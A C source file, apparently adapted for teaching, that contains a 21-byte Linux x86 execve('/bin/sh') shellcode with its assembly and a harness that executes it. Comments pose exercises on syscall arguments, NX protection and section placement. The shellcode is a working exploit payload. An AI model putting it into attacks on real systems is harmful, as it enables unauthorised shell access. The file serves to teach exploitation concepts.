/*
 *  Title: linux/x86 Shellcode execve ("/bin/sh") - 21 Bytes
 *  Date     : 10 Feb 2011
 *  Author   : kernel_panik
 *  Thanks   : cOokie, agix, antrhacks
 */

/* Understand why this shellcode works to exec "/bin/sh".
   In particular, observe how the 2 arguments to the 
   exec() system call are passed -- see "man 2 execve" 
   for the argument types this system call takes.
   Observe that "man exec" gives you the man page 
   for various libc wrappers of the syscall (Unix manual 
   section 3), not the raw syscall (section 2) */

/* 
 *  xor ecx, ecx
 *  mul ecx
 *  push ecx
 *  push 0x68732f2f   ;; hs//
 *  push 0x6e69622f   ;; nib/
 *  mov ebx, esp
 *  mov al, 11
 *  int 0x80
 *         
 */

/* 
   If you are interested in the history of shellcode, read
    AlephOne's "Smashing The Stack For Fun And Profit" in Phrack 49:14,
       http://www.phrack.org/issues.html?issue=49&id=14
 */


#include <stdio.h>
#include <string.h>


/* With const, the following byte array gets emitted 
   into the .rodata section, and then into the 
   read-only/executable program segment, where
   it _can_ be executed, even though .rodata is
   not supposed to be loaded into executable pages.

   Remove const, and it will get emitted into .data,
   which will be loaded in the non-executable segment
   and calling it will cause a segmentation fault
   on CPUs with NX feature enabled. */  

/* How to find if your CPU has NX: "cat /proc/cpuinfo | grep nx" */

const char code[] = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f"
              "\x73\x68\x68\x2f\x62\x69\x6e\x89"
              "\xe3\xb0\x0b\xcd\x80";

/* Try it without const under gdb, and observe the segfaulting
   address. What does the f() invocation look like in disassembly?  */

/* Use "readelf -a" to find at which addresses and in which sections 
   the code ends up. */

int main(int argc, char **argv)
{
 printf ("Shellcode length : %d bytes\n", strlen (code));
 int(*f)()=(int(*)())code;
 f();
}